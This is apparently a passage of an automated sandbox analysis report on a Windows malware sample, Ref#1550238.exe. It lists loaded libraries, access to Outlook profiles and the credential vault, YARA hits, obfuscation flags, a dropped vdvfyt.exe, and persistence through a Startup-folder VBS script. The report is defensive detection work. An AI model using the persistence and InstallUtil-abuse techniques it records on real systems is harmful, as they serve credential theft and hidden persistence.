                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Ref#1550238.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Ref#1550238.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#1550238.exe, 00000000.00000002.2527052061.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#1550238.exe, 00000000.00000002.2527052061.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: 0.2.Ref#1550238.exe.38d1b68.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#1550238.exe.38d1b68.5.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#1550238.exe.38d1b68.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#1550238.exe.38d1b68.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#1550238.exe.38d1b68.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#1550238.exe.3921b88.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#1550238.exe.3921b88.3.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#1550238.exe.3921b88.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#1550238.exe.3921b88.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#1550238.exe.3921b88.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.6ab0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.3843d28.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2528281598.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2509223302.000000000274F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#1550238.exe PID: 4920, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 6740, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C4A22 push eax; retf 0_2_063C4A23
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C4ADD pushfd ; iretd 0_2_063C4ADE
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C4B0F push eax; retf 0_2_063C4B10
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C33B1 pushfd ; iretd 0_2_063C33B2
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C4BAA push edx; retf 0_2_063C4BAB
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C8046 push es; retf 0_2_063C8060
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C50B2 push eax; retf 0_2_063C50B3
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A24030 push es; ret 0_2_06A240E0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A3C6A7 push edi; ret 0_2_06A3C6BE
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A33EAF push es; ret 0_2_06A33F24
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A33E61 push es; ret 0_2_06A33F24
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A30FED push es; iretd 0_2_06A30FF4
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06B8F39F pushfd ; iretd 0_2_06B8F3A0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06B82410 push es; ret 0_2_06B82420
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06B8C816 push es; ret 0_2_06B8C82C
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06B8F564 pushfd ; iretd 0_2_06B8F565
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06C43234 pushfd ; iretd 0_2_06C4323A
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06EA6508 push eax; iretd 0_2_06EA650D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_03290C6D push edi; retf 3_2_03290C7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CEFAF0 push es; ret 3_2_06CEFAF4
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B904A0 pushfd ; iretd 5_2_05B904A2
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B96788 push es; iretd 5_2_05B96796
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9FF30 push ds; iretd 5_2_05B9FF3E
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B94F21 push eax; retf 5_2_05B94F22
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B96741 push es; iretd 5_2_05B9674E
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9D69E push ebx; iretd 5_2_05B9D6BE
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9FEEA push ds; iretd 5_2_05B9FEF6
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B94EC2 pushfd ; iretd 5_2_05B94EC3
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9E647 pushad ; iretd 5_2_05B9E666
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9D198 push esp; iretd 5_2_05B9D1A5
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B950B2 push eax; retf 5_2_05B950B3
                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile created: C:\Users\user\AppData\Roaming\vdvfyt.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
